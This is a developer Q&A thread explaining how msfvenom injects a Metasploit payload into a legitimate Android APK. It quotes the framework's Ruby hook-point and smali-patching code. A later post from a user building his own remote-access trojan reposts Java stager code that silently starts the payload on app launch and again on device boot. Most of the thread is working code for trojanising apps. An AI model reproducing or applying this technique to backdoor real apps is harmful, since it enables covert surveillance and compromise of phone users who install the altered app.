How does msfvenom template an APK's Launcher Activity without an onCreate method?

[Morsmalleo]

G'day guys another question from me, I'm wondering how msfvenom is able to Template APK's when the <application class's launcher activity has no onCreate method.

Example

Here we see from an Example the Launcher Activity is defined in the first instance of the <application Class.

please correct me if I am wrong in any of the info I have provided

<application android:name="com.example.myapp.App">

Which directs us to a .smali file in a directory like

./exampleApp/smali/com/example/myapp/App.smali

However in this .smali file we find there is no onCreate methods anywhere for hooking!

so my question is how is msfvenom able to template an APK like the example above if there is no onCreate methods available in the .smali file that it has determined is suitable for hooking based on reading the AndroidManifest's <application class???

The same also applies to some APK's where the Launcher Activity defined by the <activity class has no onCreate methods available for hooking if there is no Launcher Activity defined by the <application class

[bcoles]

TL/DR: It patches the smali code. It inserts invoke-static <payload> before the function return (return-void) inside the main application or activity class.

See also: A quick guide to Android app reversing

---

msfvenom uses Msf::PayloadGenerator.generate_payload to generate a payload.

This method calls Msf::Payload::Apk.backdoor_apk with the provided APK file as input.

metasploit-framework/lib/msf/core/payload_generator.rb

Lines 406 to 414 in f043b12

	elsif payload.start_with? "android/" and not template.blank?
	if payload.start_with? "android/meterpreter_"
	raise PayloadGeneratorError, "Stageless Android payloads (e.g #{payload}) are not compatible with injection (-x)"
	end
	cli_print "Using APK template: #{template}"
	apk_backdoor = ::Msf::Payload::Apk.new
	raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
	gen_payload = raw_payload
	else

This method calls Msf::Payload::Apk.find_hook_point(manifest) to parse the AndroidManifest.xml file contents extracted from the APK file and find a suitable class to hook.

metasploit-framework/lib/msf/core/payload/apk.rb

Lines 305 to 311 in f043b12

	amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
	print_status "Locating hook point..\n"
	hookable_class = find_hook_point(amanifest)
	if hookable_class.blank?
	raise 'Unable to find hookable class in AndroidManifest.xml'
	end

This method returns a full class name (for example: com.example.app.MainActivity) based on the application or activity properties.

metasploit-framework/lib/msf/core/payload/apk.rb

Lines 37 to 88 in f043b12

	# Find a suitable smali point to hook.
	# Returns the first suitable hook point.
	#
	# @param manifest [String] AndroidManifest.xml file contents
	#
	# @return [String] Full class name, for example: com.example.app.MainActivity
	def find_hook_point(manifest)
	return unless manifest
	package = manifest.xpath('//manifest').first['package']
	application = manifest.xpath('//application')
	application_name = application.attribute('name').to_s
	unless (application_name.blank? || application_name == 'android.app.Application')
	unless application_name.include?('.')
	application_name = '.' + application_name
	end
	if application_name.start_with?('.')
	application_name = package + application_name
	end
	return application_name
	end
	activities = manifest.xpath('//activity|//activity-alias')
	for activity in activities
	activity_name = activity.attribute('targetActivity').to_s
	if activity_name.blank?
	activity_name = activity.attribute('name').to_s
	end
	next if activity_name.blank?
	category = activity.search('category')
	next unless category
	for cat in category
	category_name = cat.attribute('name').to_s
	next unless (category_name == 'android.intent.category.LAUNCHER' || category_name == 'android.intent.action.MAIN')
	unless activity_name.include?('.')
	activity_name = '.' + activity_name
	end
	if activity_name.start_with?('.')
	activity_name = package + activity_name
	end
	return activity_name
	end
	end
	nil
	end

Msf::Payload::Apk.backdoor_apk then reads the associated class file and checks for "return-void".

metasploit-framework/lib/msf/core/payload/apk.rb

Lines 313 to 324 in f043b12

	hookable_class_filename = hookable_class.to_s.gsub('.', '/') + '.smali'
	hookable_class_filepath = "#{tempdir}/original/smali*/#{hookable_class_filename}"
	smalifile = Dir.glob(hookable_class_filepath).select { |f| File.readable?(f) && !File.symlink?(f) }.flatten.first
	if smalifile.blank?
	raise "Unable to find class file: #{hookable_class_filepath}"
	end
	hooksmali = File.binread(smalifile)
	entrypoint = 'return-void'
	unless hooksmali.include?(entrypoint)
	raise "Unable to find hookable function in #{smalifile}"
	end

It later inserts "invoke-static {}, #{hookfunction}\n" before "return-void", to execute the injected payload before the function returns.

metasploit-framework/lib/msf/core/payload/apk.rb

Lines 358 to 366 in f043b12

	if service
	hookfunction = "L#{package_slash}/#{classes['MainService']};->start()V"
	else
	hookfunction = "L#{package_slash}/#{classes['Payload']};->startContext()V"
	end
	payloadhook = %Q^invoke-static {}, #{hookfunction}
	^ + entrypoint
	hookedsmali = hooksmali.sub(entrypoint, payloadhook)

[Morsmalleo]

You seem very knowledgeable with this stuff @bcoles, thank you very much for the detailed answer 😃

[Morsmalleo]

@bcoles Could I possibly send you an email to discuss with you the possibility of helping me out with a custom RAT project I'm working on? It draws a lot of influence from msfvenom but it's built with nodeJS.

[bcoles]

You seem very knowledgeable with this stuff @bcoles,

I've been known to use grep from time to time.

@bcoles Could I possibly send you an email to discuss with you the possibility of helping me out with a custom RAT project I'm working on? It draws a lot of influence from msfvenom but it's built with nodeJS.

No thanks. I would prefer to work on Metasploit. The only time I use Metasploit APK functionality is when someone submits a bug report.

I believe kids these days use TheFatRat.

[Morsmalleo]

No problem 🙂 yeah I've used TheFatRat quite a lot, however I'm really focused on making my own sort of custom payload builder, no where near as advanced as msfvenom but hopefully good enough, thank you again for providing me answers to my questions.

[Morsmalleo]

Finally figured out how the backdooring process works in order to start a metasploit Android Payload that's been bound to a legit APK upon launching the App after installation.

I'll keep it as short as possible.

So thanks to @bcoles answer, I've found out that msfvenom throws a static hook method into a legit APK's main launcher activity just before the first instance of return-void, the hook method resembles the example below before it's obfuscated or encrypted later on before building.

invoke-static {}, Lsome/package/id/metasploit/stage/MainService;->start()V

Once this is done the Smali code inside the following metasploit .smali files...

• MainService.smali
• Payload.smali
• MainActivity.smali
• MainBroadcastReceiver.smali

...is responsible for allowing the hook method to work.

The code that it uses was hard for me to read in Smali so I grabbed the original Java code from the Rapid7/metasploit-payloads repo located inside the Repo's java/androidpayload/app/src/com/metasploit/stage directory, the Java code snippets stated below are responsible for allowing this hook function to work, I know for a fact they are because a non-msf custom APK payload of my own now uses the same method for hooking and it works beautifully.

• MainService.java

I believe this code snippet is responsible for starting the Payload injected into an original APK via means of a static hook being injected into either the APK's main <application class activity, or main <activity class activity that's attached to the MAIN||LAUNCHER attributes.

package com.metasploit.stage;

import android.app.Service;
import android.content.Context;
import android.content.Intent;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;

import java.lang.reflect.Method;

public class MainService extends Service {

    private static void findContext() throws Exception {
        Class<?> activityThreadClass;
        try {
            activityThreadClass = Class.forName("android.app.ActivityThread");
        } catch (ClassNotFoundException e) {
            // No context
            return;
        }
        final Method currentApplication = activityThreadClass.getMethod("currentApplication");
        final Context context = (Context) currentApplication.invoke(null, (Object[]) null);
        if (context == null) {
            // Post to the UI/Main thread and try and retrieve the Context
            final Handler handler = new Handler(Looper.getMainLooper());
            handler.post(new Runnable() {
                public void run() {
                    try {
                        Context context = (Context) currentApplication.invoke(null, (Object[]) null);
                        if (context != null) {
                            startService(context);
                        }
                    } catch (Exception ignored) {
                    }
                }
            });
        } else {
            startService(context);
        }
    }

    // Smali hook point
    public static void start() {
        try {
            findContext();
        } catch (Exception ignored) {
        }
    }

    public static void startService(Context context) {
        context.startService(new Intent(context, MainService.class));
    }
//-------------------------------------------------------------------//
    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        Payload.start(this); // 'Payload.startAsync(this);' works as well
        return START_STICKY;
    }

• Payload.java

This code snippet seems to be responsible for allowing the payload to start once the backdoor application has been launched.

    // Launched from activity
    private static Context context;

    public static void start(Context context) {
        Payload.context = context;

         // 'startInPath()' below is not needed,
         // It's only needed when launching 
         // from the ndk stager I believe.

         //startInPath(context.getFilesDir().toString());
    }

    public static void startContext() {
        try {
            findContext();
        } catch (Exception ignored) {
        }
    }

    private static void findContext() throws Exception {
        Class<?> activityThreadClass;
        try {
            activityThreadClass = Class.forName("android.app.ActivityThread");
        } catch (ClassNotFoundException e) {
            // No context
            return;
        }
        final Method currentApplication = activityThreadClass.getMethod("currentApplication");
        final Context context = (Context) currentApplication.invoke(null, (Object[]) null);
        if (context == null) {
            // Post to the UI/Main thread and try and retrieve the Context
            final Handler handler = new Handler(Looper.getMainLooper());
            handler.post(new Runnable() {
                public void run() {
                    try {
                        Context context = (Context) currentApplication.invoke(null, (Object[]) null);
                        if (context != null) {
                            start(context); // startAsync(context) works as well
                        }
                    } catch (Exception ignored) {
                    }
                }
            });
        } else {
            start(context); // startAsync(context) works as well
        }
    }

• MainActivity.java

From Commit history I believe this aids in starting the payload connection a lot faster when launching the backdoored application after installation or at any point after that.

MainService.startService(this);

• MainBroadcastReceiver.java

I believe this is responsible for allowing the payload to start faster once the phone either restarts or boots up from a dead battery.

if (Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())) {
            MainService.startService(context);
        }

Hopefully this helps anyone out who was wondering the same thing.